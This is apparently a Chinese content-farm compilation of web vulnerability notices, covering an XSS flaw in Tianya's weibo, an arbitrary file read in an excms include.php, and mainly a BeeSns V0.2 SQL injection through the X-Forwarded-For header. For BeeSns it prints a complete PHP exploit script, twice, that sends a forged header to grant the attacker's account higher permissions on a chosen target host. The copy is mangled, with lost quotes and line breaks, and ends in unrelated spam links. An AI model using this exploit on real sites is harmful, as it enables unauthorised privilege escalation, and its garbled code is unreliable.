下面是小编精心整理的天涯微博系统XSS漏洞及修复方案(共含4篇),希望能够帮助到大家。同时,但愿您也能像本文投稿人“远离sb”一样,积极向本站投稿分享好文章。
详细说明:参考如下URL
my.tianya.cn/#app=key_
话题参数直接通过key_XXX 传递,并且没有过滤
漏洞证明:
修复方案:
建议使用数字/hash id作为URL传参,也方便过滤
发布日期:-1.27
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: www.beesns.com/
漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限
这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧
01 // 获取客户端IP
02 functiongetip {
03 if(isset($_SERVER)) {
04 if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) {
05 $realip= $_SERVER[HTTP_X_FORWARDED_FOR];
06 } elseif(isset($_SERVER[HTTP_CLIENT_IP])) {
07 $realip= $_SERVER[HTTP_CLIENT_IP];
08 } else{
09 $realip= $_SERVER[REMOTE_ADDR];
10 }
11 } else{
12 if(getenv(“HTTP_X_FORWARDED_FOR”)) {
13 $realip= getenv( “HTTP_X_FORWARDED_FOR”);
14 } elseif(getenv(“HTTP_CLIENT_IP”)) {
15 $realip= getenv(“HTTP_CLIENT_IP”);
16 } else{
17 $realip= getenv(“REMOTE_ADDR”);
18 }
19 }
20 $iphide=explode(“.”,$realip);
21
22 $realip=“$iphide[0].$iphide[1].$iphide[2].$iphide[3]”;//!我不明白作者写的神马东西,IP没过滤,漏洞产生
23 return$realip;
24 }
老掉牙的漏洞了,纯属YY, - -!
EXP:
01
02 print_r(
03 +---------------------------------------------------------------------------+
04 BeeSns v0.2 Getip() Remote SQL Injection Exploit
05 site:www.beesns.com
06 by 子仪
07 Blog: www.zyday.com
08
09 +---------------------------------------------------------------------------+
);
10
11 if(empty($_POST[submit])) {
12 }else{
13 error_reporting(7);
14 ini_set(max_execution_time, 0);
15 $host= $_POST[host];
16 $path= $_POST[path];
17 $username= $_POST[username];
18 $password= $_POST[password];
19 send();
20 }
21
22
23 functionsend()
24 {
25 global$host, $path,$username,$password;
26
27 $cmd= “uId=”.$username.“&uPw=”.$password;
28 $getinj=“1.1.1.1,permissions=5 where uid=$username#”;
29 $data= “POST ”.$path.“post.php?act=userLogin HTTP/1.1”;
30 $data.= “Accept: */*”;
31 $data.= “Accept-Language: zh-cn”;
32 $data.= “Content-Type: application/x-www-form-urlencoded”;
33 $data.= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”;
34 $data.= “Host: $host”;
35 $data.= “Content-Length: ”.strlen($cmd).“”;
36 $data.= “Connection: Close”;
37 $data.= “X-Forwarded-For: $getinj”;
38 $data.= $cmd;
39
40 $fp= fsockopen($host, 80);
41 fputs($fp, $data);
42
43 $resp= ;
44
45 while($fp&& !feof($fp))
46 $resp.= fread($fp, 1024);
47
48 if(preg_match(#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis,$resp)){
49 echo“
提升权限成功!”;
50 }else{
51 echo“Failed!”;
52 }
53
54 }
55 ?>
56
57 目标地址:*请勿加
58 二级目录:*如果不是二级目录,请保持默认
59 用户名:*您在目标站申请的用户名,建议用小号测试
60 密码:
61
62
修复:IP过滤
详细说明:$_GET['file']过滤不严格,爆任意文件
漏洞证明:www.excms.cn/apps/include.php?file=index.php
修复方案:对$_GET['file']进行严格过滤
作者 路人甲@乌云@乌云
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: www.beesns.com/
漏洞类型:权限提升
漏洞分析:IP过滤不严,导致用户可以提交恶意参数提升自身权限,
BeeSns微博系统V0.2提升权限0day and exp漏洞预警
。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧
// 获取客户端IP function getip() { if (isset($_SERVER)) { if (isset($_SERVER[HTTP_X_FORWARDED_FOR])) { $realip = $_SERVER[HTTP_X_FORWARDED_FOR]; } elseif (isset($_SERVER[HTTP_CLIENT_IP])) { $realip = $_SERVER[HTTP_CLIENT_IP]; } else { $realip = $_SERVER[REMOTE_ADDR]; } } else { if (getenv(“HTTP_X_FORWARDED_FOR”)) { $realip = getenv( “HTTP_X_FORWARDED_FOR”); } elseif (getenv(“HTTP_CLIENT_IP”)) { $realip = getenv(“HTTP_CLIENT_IP”); } else { $realip = getenv(“REMOTE_ADDR”); } } $iphide=explode(“.”,$realip); $realip=“$iphide[0].$iphide[1].$iphide[2].$iphide[3]”;//!我不明白作者写的神马东西,IP没过滤,漏洞产生 return $realip; }
EXP:
BeeSns v0.2 Getip() Remote SQL Injection Exploit
site:www.beesns.com
by 子仪
Blog: www.zyday.com
+---------------------------------------------------------------------------+
'); if (empty($_POST[submit])) { }else{ error_reporting(7); ini_set('max_execution_time', 0); $host = $_POST[host]; $path = $_POST[path]; $username = $_POST[username]; $password = $_POST[password]; send(); } function send() { global $host, $path,$username,$password; $cmd = “uId=”.$username.“&uPw=”.$password; $getinj=“1.1.1.1',permissions=5 where uid='$username'#”; $data = “POST ”.$path.“post.php?act=userLogin HTTP/1.1rn”; $data .= “Accept: */*rn”; $data .= “Accept-Language: zh-cnrn”; $data .= “Content-Type: application/x-www-form-urlencodedrn”; $data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn”; $data .= “Host: $hostrn”; $data .= “Content-Length: ”.strlen($cmd).“rn”; $data .= “Connection: Closern”; $data .= “X-Forwarded-For: $getinjrnrn”; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){ echo “
提升权限成功!”; }else{ echo “Failed!”; } } ?>
二级目录:*如果不是二级目录,请保持默认
用户名:*您在目标站申请的用户名,建议用小号测试
密码:
如果本地无PHP环境,可使用在线EXP测试:点击进入
★ 微博营销方案
★ 微博活动方案格式
★ 党建微博活动方案
★ 微博签名
★ 微博语录
★ 范文芳微博
★ 微博征文